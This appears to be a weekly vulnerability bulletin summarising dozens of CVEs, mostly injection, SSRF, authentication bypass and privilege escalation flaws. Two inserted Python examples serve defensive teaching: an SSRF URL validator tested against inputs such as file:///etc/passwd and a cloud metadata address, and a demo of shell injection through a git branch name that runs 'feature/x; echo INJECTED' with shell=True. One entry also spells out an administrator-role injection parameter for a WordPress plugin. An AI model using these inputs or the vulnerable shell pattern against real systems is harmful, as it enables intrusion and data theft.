strukturag–libheif libheif is a HEIF and AVIF file format decoder and encoder. Versions 1.21.2 and prior contain a heap buffer over-read in HeifPixelImage::overlay() in libheif/pixelimage.cc. When compositing an overlay image (iovl) whose child image has a different bit depth for the alpha channel than for the color channels, the function indexes into the alpha plane using the color channel stride (in_stride) instead of the previously retrieved alpha_stride, causing reads past the end of the alpha buffer (up to 3,123 bytes for a 100×50 image with 10-bit color and 8-bit alpha). A crafted HEIF file can exploit this to cause a denial of service (crash) or potentially disclose adjacent heap memory through leaked bytes embedded in the decoded output pixels. This issue has been fixed in version 1.22.0. 2026-05-19 7.1 CVE-2026-32882
SUSE–Container suse/sle-micro-rancher/5.3:latest In `src/havegecmd.c`, the `socket_handler` function performs a credential check on the abstract UNIX socket (`/sys/entropy/haveged`). However, while it detects if the connecting user is not root (`cred.uid != 0`) and prepares a negative acknowledgement (`ASCII_NAK`), it **fails to stop execution**. The code proceeds to the `switch` statement, allowing any local unprivileged user to execute privileged commands such as `MAGIC_CHROOT`. 2026-05-20 7.8 CVE-2026-41054
SUSE–SUSE Linux Enterprise `PluginScript` attempts to `chroot` the plugin to the `repoManagerRoot`, but this root is frequently `/` (the system root) in standard configurations or when using `--root`. If the chroot target is `/`, the chroot is a no-op, allowing the traversed path to execute host binaries (like `/bin/bash`) with root privileges. 2026-05-20 7.8 CVE-2026-44933
syslink software AG–Avantra Insufficient session expiration vulnerability in syslink software AG Avantra on Linux, Windows allows Reusing Session IDs (aka Session Replay). This issue affects Avantra: before 25.3.1. 2026-05-22 9.6 CVE-2026-8670
syslink software AG–Avantra Insertion of sensitive information into log file vulnerability in syslink software AG Avantra on Linux, Windows allows Resource Leak Exposure. This issue affects Avantra: before 25.3.0. 2026-05-22 7.5 CVE-2026-8671
Taiko Network Communications Pte Ltd.–AG1000-01A SMS Alert Gateway Taiko AG1000-01A SMS Alert Gateway Rev 7.3 and Rev 8 contains a hard-coded credential vulnerability in the embedded web configuration interface where authentication is implemented entirely in client-side JavaScript in login.zhtml, exposing static plaintext credentials in the page source. Unauthenticated attackers with network access can recover administrative credentials directly from the client-side validate() function to obtain full administrative access to the device. 2026-05-20 9.8 CVE-2026-9139
Taiko Network Communications Pte Ltd.–AG1000-01A SMS Alert Gateway Taiko AG1000-01A SMS Alert Gateway Rev 7.3 and Rev 8 contains an authentication bypass vulnerability in the embedded web configuration interface that allows unauthenticated attackers to access internal application pages without any session management or server-side authentication checks. Attackers with network access can directly request internal resources such as index.zhtml, point.zhtml, and log.shtml to gain full administrative read and write access, enabling unauthorized modification of alarm routing, device configuration, and disruption of monitoring and control functions. 2026-05-20 9.8 CVE-2026-9141
Taiko Network Communications Pte Ltd.–AG1000-01A SMS Alert Gateway Taiko AG1000-01A SMS Alert Gateway Rev 7.3 and Rev 8 contains a stored cross-site scripting vulnerability in the embedded web configuration interface that allows authenticated attackers to execute persistent JavaScript by fragmenting malicious payloads across multiple administrative form fields. Attackers can bypass front-end length restrictions using JavaScript comments and template literals to concatenate executable script fragments that are rendered in administrative dashboard views such as index.zhtml, resulting in persistent script execution within administrative sessions. 2026-05-20 7.6 CVE-2026-9144
Talend–Talend Administration Center A broken access control issue has been identified in the Talend Administration Center, that allows a user with “View” permission to modify the Talend Studio update URL. This issue was resolved in a patch, which is already available. 2026-05-20 8.2 CVE-2026-9057
tenable–Terrascan Terrascan v1.18.3 and prior are vulnerable to Server-Side Request Forgery (SSRF) via the webhook_url parameter in the file scan endpoint (POST /v1/{iac}/{iacVersion}/{cloud}/local/file/scan) when running in server mode. An unauthenticated remote attacker can supply an arbitrary URL as the webhook_url multipart form parameter. After scanning the uploaded file, Terrascan sends an HTTP POST request to the attacker-controlled URL containing the full scan results as a JSON body, with the attacker-supplied webhook_token forwarded as a Bearer token in the Authorization header. The retryable HTTP client retries up to 10 times on failure. This affects deployments running terrascan in server mode (terrascan server), which binds to 0.0.0.0 with no authentication. Note: Terrascan was archived in August 2023 and no patch will be released. 2026-05-19 7.5 CVE-2026-47356
tenable–Terrascan Terrascan v1.18.3 and prior are vulnerable to Server-Side Request Forgery (SSRF) via the remote_url parameter in the remote directory scan endpoint (POST /v1/{iac}/{iacVersion}/{cloud}/remote/dir/scan) when running in server mode. An unauthenticated remote attacker can supply an attacker-controlled HTTP URL as remote_url with remote_type set to “http”. The URL is passed directly to hashicorp/go-getter (v1.7.5) without validation. Go-getter’s HttpGetter supports the X-Terraform-Get response header, allowing the attacker’s server to redirect the download to a file:// URL, enabling local file read. Additionally, HttpGetter has Netrc set to true, causing it to read ~/.netrc and send stored credentials to attacker-controlled hostnames. This affects deployments running terrascan in server mode (terrascan server), which binds to 0.0.0.0 with no authentication. Note: Terrascan was archived in August 2023 and no patch will be released. 2026-05-19 7.5 CVE-2026-47357
tenable–Terrascan Terrascan v1.18.3 and prior are vulnerable to Server-Side Request Forgery (SSRF) via external URL resolution in uploaded IaC templates when running in server mode. When Terrascan parses uploaded ARM templates or CloudFormation templates, it resolves external URLs referenced within those templates via hashicorp/go-getter with all default detectors enabled, including FileDetector. An unauthenticated remote attacker can upload an ARM template containing a templateLink.uri or parametersLink.uri field, or a CloudFormation template containing an AWS::CloudFormation::Stack TemplateURL field, pointing to an attacker-controlled URL. Terrascan will fetch the attacker-controlled URL server-side. Unlike SSRF via the remote scan endpoint, file:// URLs are directly usable without requiring an X-Terraform-Get redirect, enabling local file read. This affects deployments running terrascan in server mode (terrascan server), which binds to 0.0.0.0 with no authentication. Note: Terrascan was archived in August 2023 and no patch will be released. 2026-05-19 7.5 CVE-2026-47358
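A validator for the caller-supplied URLs in the three Terrascan issues above (webhook_url, remote_url and template link fields), as an added example that is not Terrascan's code and is written in Python rather than Go: it allows only http/https (so file:// never reaches a go-getter-style fetcher), rejects embedded credentials, and refuses hosts that are, or resolve to, loopback, private, link-local or other non-global addresses. The resolver is injected and the DNS answers are constructed so the demo runs offline.

```python
# Added example, not Terrascan's code: validate an outbound URL supplied by an
# unauthenticated caller before the server fetches or posts to it.
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def _is_disallowed(ip) -> bool:
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_outbound_url(url: str, resolver):
    """Return (ok, reason). `resolver(host)` must return a list of IP strings."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname  # brackets stripped for IPv6 literals
    if not host:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in URL not allowed"
    try:
        addrs = [ipaddress.ip_address(host)]          # literal IP
    except ValueError:
        addrs = [ipaddress.ip_address(a) for a in resolver(host)]
    if not addrs:
        return False, f"{host} did not resolve"
    for ip in addrs:
        if _is_disallowed(ip):
            return False, f"{host} maps to disallowed address {ip}"
    return True, "ok"


# Constructed DNS answers for the demo; one public name deliberately resolves
# to a private address, the way a rebinding or attacker-controlled zone would.
CONSTRUCTED_DNS = {
    "hooks.example.test": ["93.184.216.34"],
    "rebind.example.test": ["10.0.0.5"],
}


def demo():
    resolver = lambda host: CONSTRUCTED_DNS.get(host, [])
    cases = [
        "https://hooks.example.test/scan-results",        # legitimate webhook
        "http://rebind.example.test/",                    # public name, private answer
        "http://127.0.0.1:6379/",                         # local service
        "http://169.254.169.254/latest/meta-data/",       # cloud metadata
        "http://[::1]:8080/",                             # IPv6 loopback literal
        "file:///etc/passwd",                             # local file read
        "gopher://hooks.example.test:70/",                # non-HTTP scheme
    ]
    return [validate_outbound_url(u, resolver)[0] for u in cases]
```

Two caveats the code does not remove: the address checked here must be the one actually connected to (pin it in the HTTP client, or re-check after the connection is made, to defeat DNS rebinding), and a fetcher that follows redirects, including header-driven ones such as X-Terraform-Get, must apply the same validation to every hop or have redirects disabled, since validating only the first URL is exactly what the remote_url issue above gets around.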
Tenda–F456 A security vulnerability has been detected in Tenda F456 1.0.0.5. This affects the function frmL7ImForm of the file /goform/L7Im. The manipulation of the argument page leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. 2026-05-24 8.8 CVE-2026-9389
themefusion–Avada (Fusion) Builder The Avada Builder (fusion-builder) plugin for WordPress is vulnerable to Unauthenticated Remote Code Execution via PHP Function Injection in versions up to and including 3.15.2. This is due to the `wp_conditional_tags` case in `Fusion_Builder_Conditional_Render_Helper::get_value()` passing attacker-controlled values from a base64-decoded JSON blob directly to `call_user_func()` without any allowlist validation. This is exploitable by unauthenticated attackers through the `fusion_get_widget_markup` AJAX endpoint, which is registered for non-privileged (unauthenticated) users via `wp_ajax_nopriv_fusion_get_widget_markup`. The endpoint is protected only by a nonce (`fusion_load_nonce`), but this nonce is generated for user ID 0 and is deterministically exposed in the JavaScript output of any public-facing page containing a Post Cards (`[fusion_post_cards]`) or Table of Contents (`[fusion_table_of_contents]`) element. This makes it possible for unauthenticated attackers to execute arbitrary code on affected sites. 2026-05-21 9.8 CVE-2026-6279
themeum–Kirki Freeform Page Builder, Website Builder & Customizer The Kirki – Freeform Page Builder, Website Builder & Customizer plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation and a missing capability check in the ‘downloadZIP’ function in all versions up to, and including, 6.0.6. This makes it possible for unauthenticated attackers to read and delete arbitrary files within the WordPress uploads base directory. 2026-05-19 7.5 CVE-2026-8073
themewant–Easy Elements for Elementor Addons & Website Templates The Easy Elements for Elementor – Addons & Website Templates plugin for WordPress is vulnerable to privilege escalation via user registration in all versions up to, and including, 1.4.4. This is due to the ‘easyel_handle_register’ function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the ‘administrator’ role during registration and gain administrator access to the site. 2026-05-20 9.8 CVE-2026-7284
themewant–Easy Elements for Elementor Addons & Website Templates The Easy Elements for Elementor – Addons & Website Templates plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.4.5 via the `easyel_handle_register()` function. This is due to the `wp_ajax_nopriv_eel_register` AJAX handler iterating the attacker-controlled `custom_meta` POST array and writing every supplied key-value pair to the newly created user’s meta via `update_user_meta()` without any key whitelist or blocklist, allowing the `wp_capabilities` user meta key to be overwritten after `wp_insert_user()` has already assigned a safe role. This makes it possible for unauthenticated attackers to register a new account with full administrator-level privileges by supplying `custom_meta[wp_capabilities][administrator]=1`. Exploitation requires that user registration is enabled on the site and that at least one page exposes the Login/Register widget, which publishes the required `easy_elements_nonce` into the page DOM where it can be retrieved by any unauthenticated visitor via a simple GET request. 2026-05-22 8.8 CVE-2026-9018
TONNET–TPR7308 E-LAN Hybrid Recording System developed by TONNET has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read database contents. 2026-05-20 7.5 CVE-2026-9003
Totolink–A8000RU A vulnerability was found in Totolink A8000RU 7.1cu.643_b20200521. This vulnerability affects the function setDiagnosisCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Manipulation of the argument ip results in OS command injection. The attack can be executed remotely. The exploit has been made public and could be used. 2026-05-24 9.8 CVE-2026-9384
Totolink–A8000RU A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. This issue affects the function setTracerouteCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Manipulation of the argument command causes OS command injection. The attack can be carried out remotely. The exploit has been publicly disclosed and may be utilized. 2026-05-24 9.8 CVE-2026-9385
Totolink–A8000RU A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. Impacted is the function setLanguageCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Manipulation of the argument lang leads to OS command injection. The attack can be performed remotely. The exploit is publicly available and might be used. 2026-05-24 9.8 CVE-2026-9386
Totolink–A8000RU A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. The affected element is the function setUpgradeFW of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Manipulation of the argument resetFlags results in OS command injection. It is possible to initiate the attack remotely. The exploit has been released to the public and may be used for attacks. 2026-05-24 9.8 CVE-2026-9387
Totolink–A8000RU A weakness has been identified in Totolink A8000RU 7.1cu.643_b20200521. The impacted element is the function setScheduleCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Manipulation of the argument mode can lead to OS command injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks. 2026-05-24 9.8 CVE-2026-9388
Totolink–A8000RU A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. This affects the function setDdnsCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Manipulation of the argument provider leads to OS command injection. The attack may be launched remotely. The exploit is publicly available and might be used. 2026-05-24 9.8 CVE-2026-9404
Totolink–A8000RU A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. This impacts the function setGameSpeedCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Manipulation of the argument enable results in OS command injection. Remote exploitation is possible. The exploit has been released to the public and may be used for attacks. 2026-05-24 9.8 CVE-2026-9405
Totolink–A8000RU A weakness has been identified in Totolink A8000RU 7.1cu.643_b20200521. Affected is the function setRemoteCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Manipulation of the argument enable can lead to OS command injection. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks. 2026-05-24 9.8 CVE-2026-9406
Totolink–A8000RU A security vulnerability has been detected in Totolink A8000RU 7.1cu.643_b20200521. Affected by this vulnerability is the function setFirewallType of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Manipulation of the argument firewallType leads to OS command injection. The attack can be carried out remotely. The exploit has been disclosed publicly and may be used. 2026-05-24 9.8 CVE-2026-9407
Trend Micro, Inc.–TrendAI Apex One A vulnerability in the Trend Micro Apex One management console could allow a remote attacker to upload malicious code and execute commands on affected installations. Please note: although this vulnerability carries a technical critical CVSS rating, this was reported via responsible disclosure via a researcher through the Zero Day Initiative. The SaaS versions of the product have already been mitigated and no customer action required. For this particular vulnerability, an attacker must have access to the Trend Micro Apex One Management Console, so customers that have their console's IP address exposed externally should consider mitigating factors such as source restrictions if not already applied. 2026-05-21 9.8 CVE-2025-71210
Trend Micro, Inc.–TrendAI Apex One A vulnerability in the Trend Micro Apex One management console could allow a remote attacker to upload malicious code and execute commands on affected installations. This vulnerability is similar in scope to CVE-2025-71210 but affects a different executable. Please note: although this vulnerability carries a technical critical CVSS rating, this was reported via responsible disclosure via a researcher through the Zero Day Initiative. The SaaS versions of the product have already been mitigated and no customer action required. For this particular vulnerability, an attacker must have access to the Trend Micro Apex One Management Console, so customers that have their console's IP address exposed externally should consider mitigating factors such as source restrictions if not already applied. 2026-05-21 9.8 CVE-2025-71211
Trend Micro, Inc.–TrendAI Apex One A link following vulnerability in the Trend Micro Apex One scan engine could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. 2026-05-21 7.8 CVE-2025-71212
Trend Micro, Inc.–TrendAI Apex One An origin validation error vulnerability in Trend Micro Apex One could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. 2026-05-21 7.8 CVE-2025-71213
Trend Micro, Inc.–TrendAI Apex One An origin validation vulnerability in the Apex One/SEP agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. 2026-05-21 7.8 CVE-2026-34927
Trend Micro, Inc.–TrendAI Apex One An origin validation vulnerability in the Apex One/SEP agent could allow a local attacker to escalate privileges on affected installations. This is similar to CVE-2026-34927 but exists in a different named pipe communication mechanism. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. 2026-05-21 7.8 CVE-2026-34928
Trend Micro, Inc.–TrendAI Apex One An origin validation vulnerability in the Apex One/SEP agent could allow a local attacker to escalate privileges on affected installations. This is similar to CVE-2026-34927 but exists in a different inter-process communication mechanism. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. 2026-05-21 7.8 CVE-2026-34929
Trend Micro, Inc.–TrendAI Apex One An origin validation vulnerability in the Apex One/SEP agent could allow a local attacker to escalate privileges on affected installations. This is similar to CVE-2026-34927 but exists in a different process protection mechanism. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. 2026-05-21 7.8 CVE-2026-34930
Trend Micro, Inc.–TrendAI Apex One An origin validation vulnerability in the Apex One/SEP agent could allow a local attacker to escalate privileges on affected installations. This is similar to CVE-2026-45207 but exists in a different process protection communication mechanism. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. 2026-05-21 7.8 CVE-2026-45206
Trend Micro, Inc.–TrendAI Apex One An origin validation vulnerability in the Apex One/SEP agent could allow a local attacker to escalate privileges on affected installations. This is similar to CVE-2026-45206 but exists in a different process protection communication mechanism. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. 2026-05-21 7.8 CVE-2026-45207
Trend Micro, Inc.–TrendAI Apex One A time-of-check time-of-use vulnerability in the Apex One/SEP agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. 2026-05-21 7.8 CVE-2026-45208
TriliumNext–Trilium Trilium Notes is a cross-platform, hierarchical note taking application focused on building large personal knowledge bases. In versions 0.102.1 and prior, the Clipper API in Trilium Desktop (v0.101.3) allows full authentication bypass when running in an Electron environment. When Trilium detects an Electron environment, it explicitly disables authentication middleware for the Clipper API, exposing endpoints such as /api/clipper/notes to the network with no password, API token, or CSRF protection. An attacker on a shared network (for example, a corporate LAN or public Wi-Fi) can scan for open high-range ports using a tool like nmap, since Trilium often binds to ports such as 37840. Once a candidate port is found, an unauthenticated request to the Clipper handshake endpoint, which also bypasses authentication, confirms a Trilium instance by returning the application name and protocol version. This facilitates unauthorized data access, phishing, and local system compromise. The issue has been fixed in version 0.102.2. 2026-05-20 8.6 CVE-2026-39310
twigphp–Twig Twig versions 2.16.x and 3.9.0 through 3.25.x contain a sandbox bypass vulnerability when using a SourcePolicyInterface that allows attackers with template rendering capabilities to pass arbitrary PHP callables to sort, filter, map, and reduce filters. Attackers can exploit the runtime check that fails to use the current template source to bypass sandbox restrictions and execute arbitrary code when the sandbox is enabled through a source policy rather than globally. 2026-05-20 8.8 CVE-2026-24425
Tyler Technologies–TID-L Tyler Identity Local (TID-L) uses documented, default administrative credentials. Users are not required to change the credentials before deployment. TID-L has not been distributed since December 2020, and has not been supported since 2021. 2026-05-19 9.8 CVE-2026-44159
Ubiquiti Inc–UniFi OS Server A malicious actor with access to the network could exploit an Improper Access Control vulnerability found in UniFi OS devices to make unauthorized changes to the system. 2026-05-22 10 CVE-2026-34908
Ubiquiti Inc–UniFi OS Server A malicious actor with access to the network could exploit a Path Traversal vulnerability found in UniFi OS devices to access files on the underlying system that could be manipulated to access an underlying account. 2026-05-22 10 CVE-2026-34909
Ubiquiti Inc–UniFi OS Server A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection. 2026-05-22 10 CVE-2026-34910
Ubiquiti Inc–UniFi OS Server A malicious actor with access to the network and high privileges could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection. 2026-05-22 9.1 CVE-2026-33000
Ubiquiti Inc–UniFi OS Server A malicious actor with access to the network and low privileges could exploit a Path Traversal vulnerability found in UniFi OS devices to access files on the underlying system that could be manipulated to obtain sensitive information. 2026-05-22 7.7 CVE-2026-34911
ultimate-form-builder-lite–Ultimate Form Builder Lite WordPress Ultimate Form Builder Lite plugin version 1.3.7 and below contains an SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the entry_id POST parameter. Attackers can send POST requests to the admin-ajax.php endpoint with the ufbl_get_entry_detail_action action to extract, modify, or escalate privileges within the WordPress database. 2026-05-23 7.1 CVE-2018-25352
UserSpice–userSpice userSpice 4.3.24 contains a username enumeration vulnerability that allows unauthenticated attackers to discover valid usernames by sending POST requests to the existingUsernameCheck.php endpoint. Attackers can submit usernames and analyze response text for the ‘taken’ string to identify existing accounts in the system. 2026-05-23 9.8 CVE-2018-25350
web-dorado–Contact Form Maker WordPress Contact Form Maker Plugin 1.12.20 contains SQL injection vulnerabilities that allow authenticated attackers to manipulate database queries through the FormMakerSQLMapping and generete_csv_fmc AJAX actions. Attackers can inject malicious SQL code via the ‘name’ and ‘search_labels’ parameters to extract sensitive database information or escalate privileges. 2026-05-23 7.1 CVE-2018-25347
webdriverio–webdriverio WebdriverIO is a test automation framework for unit, e2e and component testing using WebDriver, WebDriver BiDi and Appium. Versions below 9.24.0 contain a command injection vulnerability leading to remote code execution (RCE) in test orchestration. Git permits branch names containing shell metacharacters, and getGitMetadataForAISelection() interpolates these names directly into execSync() calls without sanitization. An attacker can exploit this by supplying a malicious repository (via testOrchestrationOptions.runSmartSelection.source, or the current directory if unset) whose branch name carries a payload, causing the shell to execute arbitrary code. This enables remote code execution on CI/CD servers and developer machines, leading to credential and secret disclosure, source code and SSH key exfiltration, system compromise, and supply chain attacks via tampered build artifacts. The issue has been fixed in version 9.24.0. 2026-05-18 9.8 CVE-2026-25244
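The branch-name injection above, as an added example that is not WebdriverIO's code and is written in Python rather than the project's TypeScript: a branch name carrying a `;` is parsed by the shell when the command is built as a string, and is inert when passed as an argument vector (or, where a shell string is unavoidable, when quoted). `echo` stands in for the git invocation so the demo needs no repository; the branch name is constructed.

```python
# Added example, not WebdriverIO's code: shell metacharacters in a git branch
# name, which git's ref rules permit (';', '|', '$' and backticks are legal),
# reach the shell only when the command line is assembled as a string.
import shlex
import subprocess

MALICIOUS_BRANCH = "feature/x; echo INJECTED"  # constructed attacker-chosen name


def _run(*args, **kwargs):
    return subprocess.run(*args, capture_output=True, text=True, check=True, **kwargs)


def describe_branch_vulnerable(branch: str) -> list:
    # String interpolation + shell=True (the execSync pattern): the ';' ends
    # our command and whatever follows runs as a second command.
    return _run(f"echo {branch}", shell=True).stdout.splitlines()


def describe_branch_fixed(branch: str) -> list:
    # Argument vector, no shell: the entire name is one argv entry. For real
    # git commands also put '--' before it so a name starting with '-' cannot
    # be read as an option.
    return _run(["echo", branch]).stdout.splitlines()


def describe_branch_quoted(branch: str) -> list:
    # If a shell string is unavoidable, shlex.quote makes the name a single
    # literal word for POSIX shells.
    return _run(f"echo {shlex.quote(branch)}", shell=True).stdout.splitlines()
```

The distinguishing result is the number of output lines: the vulnerable variant prints two (`feature/x` and then `INJECTED` from the injected command), while both hardened variants print the branch name once, punctuation included. In CI the interpolated command would be running with the pipeline's credentials, which is why the advisory rates this as remote code execution rather than a local bug.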
weDevs–WP ERP Pro The WP ERP Pro plugin for WordPress is vulnerable to SQL Injection via the ‘search_key’ parameter in all versions up to, and including, 1.5.1. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. 2026-05-22 7.5 CVE-2026-4834
windmill-labs–windmill Windmill prior to 1.703.2 contains an incorrect default permissions vulnerability in nsjail sandbox configuration files where /etc is bind-mounted without read-write restrictions, allowing authenticated users to write arbitrary entries to /etc/hosts, /etc/resolv.conf, and /etc/ssl/certs/ca-certificates.crt from within script execution sandboxes. Attackers can exploit persistent poisoned entries across all subsequent script executions on the same worker pod to redirect hostnames, intercept DNS queries, perform transparent HTTPS man-in-the-middle attacks, and intercept WM_TOKEN JWTs to gain workspace-admin access to other users’ workspaces. 2026-05-19 8.1 CVE-2026-47107
Wishlist Member–Wishlist Member The WishList Member plugin for WordPress is vulnerable to Privilege Escalation via Missing Authorization in versions up to and including 3.30.1. This is due to the missing capability and nonce check in the ajax_get_screen() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to supply an arbitrary admin screen identifier via the data[url] parameter, causing the plugin to load and execute the administrative API configuration template without authorization. The rendered HTML, which contains the plugin’s plaintext REST API Secret Key, is returned directly to the attacker in the AJAX JSON response. An attacker who obtains this key can authenticate to the WishList Member API, create a new membership level assigned the administrator WordPress role, and register an arbitrary administrator-level user account, resulting in complete site takeover. 2026-05-23 8.8 CVE-2026-6419
Wishlist Member–Wishlist Member The WishList Member plugin for WordPress is vulnerable to Missing Authorization leading to Sensitive Information Disclosure and Privilege Escalation in versions up to and including 3.30.1. This is due to the missing capability checks in the ‘export_settings’ function. This function returns the REST API Secret Key to the attacker in the AJAX JSON response. An attacker who obtains this key can authenticate to the WishList Member API, create a new membership level assigned the administrator WordPress role, and register an arbitrary administrator-level user account, resulting in complete site takeover. 2026-05-23 8.8 CVE-2026-6895
Wishlist Member–Wishlist Member The Wishlist Member plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ‘WishListMemberFeaturesTeam_Accounts::save_settings’ function in all versions up to, and including, 3.30.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary plugin options, including the REST API Secret Key, which can be used to create a new membership level assigned the administrator WordPress role, and register an arbitrary administrator-level user account, resulting in complete site takeover. 2026-05-23 8.8 CVE-2026-6897
Wishlist Member–Wishlist Member The Wishlist Member plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ‘WishListMember3_Hooks::generate_api_key’ function in all versions up to, and including, 3.30.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the REST API Secret Key, which can be used to create a new membership level assigned the administrator WordPress role, and register an arbitrary administrator-level user account, resulting in complete site takeover. 2026-05-23 8.8 CVE-2026-6898
woocommerce–WooCommerce PayPal Payments The WooCommerce PayPal Payments plugin for WordPress is vulnerable to unauthorized order manipulation and information disclosure due to missing authorization checks on the `ppc-create-order` and `ppc-get-order` WC-AJAX endpoints in all versions up to, and including, 4.0.1. The `ppc-create-order` endpoint accepts an arbitrary WooCommerce order ID in the `pay-now` context without validating order ownership, allowing attackers to create PayPal orders for any WC order and write PayPal metadata to it. The `ppc-get-order` endpoint returns full PayPal order details for any PayPal order ID without binding to the requester’s session. This makes it possible for unauthenticated attackers to chain these endpoints to manipulate other customers’ order payment flows and exfiltrate sensitive order details (payer information, shipping data) by creating a PayPal order for a victim’s WC order and then retrieving the PayPal order data. 2026-05-23 8.2 CVE-2026-9284
Wp Directory Kit–WP Directory Kit Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Wp Directory Kit WP Directory Kit allows Blind SQL Injection. This issue affects WP Directory Kit: from n/a through 1.5.0. 2026-05-21 9.3 CVE-2026-39531
WP Swings–Gift Cards For WooCommerce Pro Unrestricted Upload of File with Dangerous Type vulnerability in WP Swings Gift Cards For WooCommerce Pro allows Using Malicious Files. This issue affects Gift Cards For WooCommerce Pro: from n/a through 4.2.6. 2026-05-20 10 CVE-2026-45444
yiisoft–yii2 Yii 2 is a PHP application framework. Versions 2.0.54 and prior contain flawed logic in the core view rendering method View::renderPhpFile() that leads to Local File Inclusion. The function calls extract($_params_, EXTR_OVERWRITE) before the require statement that loads the view file. As a result, a caller-controlled _file_ key in the $params array overwrites the internal local variable specifying which file to include, potentially enabling RCE if an attacker can write PHP files through a separate primitive, as well as information disclosure. This issue has been fixed in version 2.0.55. 2026-05-20 7.4 CVE-2026-39850
YITH–YITH WooCommerce Product Add-Ons Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in YITH YITH WooCommerce Product Add-Ons allows Blind SQL Injection. This issue affects YITH WooCommerce Product Add-Ons: from n/a through 4.29.0. 2026-05-20 7.6 CVE-2026-42383
ZKTeco–SSC335-GC2063-Face-0b77 Solution Camera An undocumented configuration export port is accessible on some models of ZKTeco CCTV cameras. This port does not require authentication and exposes critical information about the camera such as open services and camera account credentials. 2026-05-20 9.1 CVE-2026-8598
Zohocorp–ManageEngine ADSelfService Plus Zohocorp ManageEngine ADSelfService Plus version before 6525, DataSecurity Plus before 6264 and RecoveryManager Plus before 6313 are vulnerable to Authenticated Remote code execution in the agent machines due to the bug in the 3rd party dependency. 2026-05-21 8.4 CVE-2026-2740


Medium Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source Info Patch Info
546669204–vps-inventory-monitoring A vulnerability was determined in 546669204 vps-inventory-monitoring up to 98c00b370668c96ae75e91c15548d9ea113652d9. This issue affects the function eval of the file app/index/command/VpsTest.php of the component VpsTest Console. Executing a manipulation of the argument vf can lead to code injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet. 2026-05-23 6.3 CVE-2026-9302 VDB-365249 | 546669204 vps-inventory-monitoring VpsTest Console VpsTest.php eval code injection
VDB-365249 | CTI Indicators (IOB, IOC, TTP, IOA)
Submit #811843 | 546669204 vps-inventory-monitoring <=98c00b3 Code Injection / Eval Injection
https://github.com/546669204/vps-inventory-monitoring/issues/36
https://github.com/dntyfate/cve/issues/2
https://github.com/546669204/vps-inventory-monitoring/
 
ADD-ONS.ORG–PDF for Elementor Forms + Drag And Drop Template Builder Missing Authorization vulnerability in ADD-ONS.ORG PDF for Elementor Forms + Drag And Drop Template Builder allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects PDF for Elementor Forms + Drag And Drop Template Builder: from n/a through 5.5.1. 2026-05-20 5 CVE-2026-45443 https://patchstack.com/database/wordpress/plugin/pdf-for-elementor-forms/vulnerability/wordpress-pdf-for-elementor-forms-drag-and-drop-template-builder-plugin-5-5-1-broken-access-control-vulnerability?_s_id=cve
 
